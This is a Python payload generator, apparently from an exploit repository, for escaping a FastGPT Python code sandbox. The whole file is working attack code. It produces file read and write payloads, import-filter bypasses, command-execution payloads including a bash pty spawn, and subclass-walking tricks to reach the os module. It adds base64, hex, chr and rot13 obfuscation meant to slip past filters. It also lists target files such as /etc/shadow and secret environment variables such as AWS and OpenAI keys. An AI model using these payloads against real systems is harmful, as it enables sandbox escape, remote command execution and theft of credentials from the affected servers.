README.md
Rendering markdown...
"""
CVE-2025-49131 - FastGPT Sandbox Escape Payloads
=================================================
Collection of bypass payloads for Python sandbox escape
"""
class PayloadGenerator:
"""Generate sandbox escape payloads with various techniques"""
@staticmethod
def file_read_payloads(filepath: str) -> list:
"""Generate file read payloads"""
return [
# Basic file read
f"open('{filepath}', 'r').read()",
f"open('{filepath}').read()",
# Builtins access
f"__builtins__.open('{filepath}').read()",
f"__builtins__['open']('{filepath}').read()",
# Getattr method
f"getattr(__builtins__, 'open')('{filepath}').read()",
# Lambda wrapper
f"(lambda f: open(f).read())('{filepath}')",
# Exec/Compile
f"exec(compile('result=open(\\\"{filepath}\\\").read()','','exec'))",
# IO module
f"__import__('io').open('{filepath}').read()",
# Pathlib
f"__import__('pathlib').Path('{filepath}').read_text()",
# Codecs
f"__import__('codecs').open('{filepath}', 'r', 'utf-8').read()",
]
@staticmethod
def file_write_payloads(filepath: str, content: str) -> list:
"""Generate file write payloads"""
escaped = content.replace("'", "\\'")
return [
f"open('{filepath}', 'w').write('{escaped}')",
f"__builtins__.open('{filepath}', 'w').write('{escaped}')",
f"__import__('io').open('{filepath}', 'w').write('{escaped}')",
f"__import__('pathlib').Path('{filepath}').write_text('{escaped}')",
]
@staticmethod
def import_bypass_payloads(module: str) -> list:
"""Generate import restriction bypass payloads"""
return [
# Direct __import__
f"__import__('{module}')",
# Builtins __import__
f"__builtins__.__import__('{module}')",
f"__builtins__['__import__']('{module}')",
# Importlib
f"__import__('importlib').import_module('{module}')",
# Exec import
f"exec('import {module}')",
f"exec('import {module}; result = {module}')",
# Compile and exec
f"exec(compile('import {module}', '', 'exec'))",
# Subclass walking (find catch_warnings which has access to modules)
f"[x for x in ().__class__.__base__.__subclasses__() if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__']('{module}')",
# Using __loader__
f"__loader__.load_module('{module}')" if module else "",
]
@staticmethod
def rce_payloads(command: str) -> list:
"""Generate RCE payloads"""
escaped = command.replace("'", "\\'")
return [
# os.system
f"__import__('os').system('{escaped}')",
# os.popen
f"__import__('os').popen('{escaped}').read()",
# subprocess.check_output
f"__import__('subprocess').check_output('{escaped}', shell=True)",
# subprocess.getoutput
f"__import__('subprocess').getoutput('{escaped}')",
# subprocess.run
f"__import__('subprocess').run('{escaped}', shell=True, capture_output=True).stdout",
# Platform/commands
f"__import__('commands').getoutput('{escaped}')" if command else "",
# pty spawn
f"__import__('pty').spawn('/bin/bash')",
]
@staticmethod
def info_gathering_payloads() -> list:
"""Generate information gathering payloads"""
return [
# Environment variables
"__import__('os').environ.copy()",
"dict(__import__('os').environ)",
# Current user
"__import__('os').getuid()",
"__import__('pwd').getpwuid(__import__('os').getuid())",
# Current directory
"__import__('os').getcwd()",
# List directory
"__import__('os').listdir('/')",
"__import__('os').listdir('/home')",
# Process info
"__import__('os').getpid()",
# System info
"__import__('platform').platform()",
"__import__('platform').uname()",
# Network info
"__import__('socket').gethostname()",
"__import__('socket').getfqdn()",
]
@staticmethod
def obfuscate(payload: str, method: str = 'base64') -> str:
"""Obfuscate payload to bypass filters"""
import base64
if method == 'base64':
encoded = base64.b64encode(payload.encode()).decode()
return f"exec(__import__('base64').b64decode('{encoded}').decode())"
elif method == 'hex':
encoded = payload.encode().hex()
return f"exec(bytes.fromhex('{encoded}').decode())"
elif method == 'chr':
chars = ','.join(str(ord(c)) for c in payload)
return f"exec(''.join(chr(c) for c in [{chars}]))"
elif method == 'rot13':
import codecs
encoded = codecs.encode(payload, 'rot13')
return f"exec(__import__('codecs').decode('{encoded}', 'rot13'))"
return payload
@staticmethod
def subclass_rce() -> str:
"""
Generate RCE via subclass walking
This finds a class that has access to os module
"""
return """
# Find os._wrap_close which has access to os module
for i, cls in enumerate(().__class__.__base__.__subclasses__()):
if cls.__name__ == '_wrap_close':
# cls.__init__.__globals__['system']('id')
print(f"Found {cls.__name__} at index {i}")
print(cls.__init__.__globals__.keys())
break
"""
# Payload collections for different scenarios
DETECTION_PAYLOADS = [
"type(__builtins__)",
"dir()",
"globals().keys()",
"__name__",
]
COMMON_TARGETS = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/self/environ",
"/proc/self/cmdline",
"/home/.bashrc",
"~/.bash_history",
"/var/log/syslog",
]
SENSITIVE_ENV_VARS = [
"DATABASE_URL",
"DB_PASSWORD",
"SECRET_KEY",
"API_KEY",
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY",
"MONGO_URI",
"REDIS_URL",
"OPENAI_API_KEY",
]